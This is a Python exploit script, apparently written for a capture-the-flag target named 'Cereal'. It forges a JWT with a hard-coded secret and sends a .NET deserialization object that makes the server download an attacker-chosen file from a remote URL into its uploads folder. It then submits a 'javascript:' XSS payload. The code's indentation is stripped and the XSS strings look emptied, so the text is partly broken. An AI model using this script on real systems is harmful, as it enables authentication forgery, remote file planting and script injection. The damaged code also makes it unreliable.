#!/usr/bin/env python3
import jwt
import requests
import sys
from datetime import datetime, timedelta
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# Get args
try:
target = sys.argv[1]
url = sys.argv[2]
saveas = sys.argv[3]
except IndexError:
print(f'Usage: {sys.argv[0]} [target ip/domain] [url to upload] [filename on target]')
sys.exit()
# Forge JWT
print('[*] Forging JWT token')
token = jwt.encode({'name': "1", "exp": datetime.utcnow() + timedelta(days=7)}, 'secretlhfIH&FY*#oysuflkhskjfhefesf', algorithm="HS256")
headers = {'Authorization': f'Bearer {token}', 'Content-Type': 'application/json'}
# Send DownloadHelper object as JSON
print('[*] Sending DownloadHelper serialized object')
serial_payload = {"json": "{'$type':'Cereal.DownloadHelper, Cereal','URL':'" + url + "','FilePath': 'C:\\\\inetpub\\\\source\\\\uploads\\\\" + saveas + "'}"}
resp = requests.post(f'https://{target}/requests', json=serial_payload, headers=headers, verify=False)
if resp.status_code != 200:
print(f'[-] Something went wrong: {resp.text}')
sys.exit()
serial_id = resp.json()['id']
print(f'[+] Object uploaded: {resp.text}')
# Send XSS payload
print('[*] Sending XSS payload')
#xss_payload = {"json":'{"title":"[XSS](javascript: document.write%28%27%27%29)","flavor":"sushi","color":"#FFF","description":"asd"}'}
#xss_payload = {"json":"{\"title\":\"[XSS](javascript: document.write%28%22%22%29)\",\"flavor\":\"bacon\",\"color\":\"#FFF\",\"description\":\"\"}"}
xss_payload = {"json":"{\"title\":\"[XSS](javascript: document.write%28%22%22%29)\",\"flavor\":\"pizza\",\"color\":\"#FFF\",\"description\":\"test\"}"}
resp = requests.post(f'https://{target}/requests', json=xss_payload, headers=headers, verify=False)
if resp.status_code != 200:
print('[-] Something went wrong: {resp.text}')
sys.exit()
print(f'[+] XSS payload sent: {resp.text}')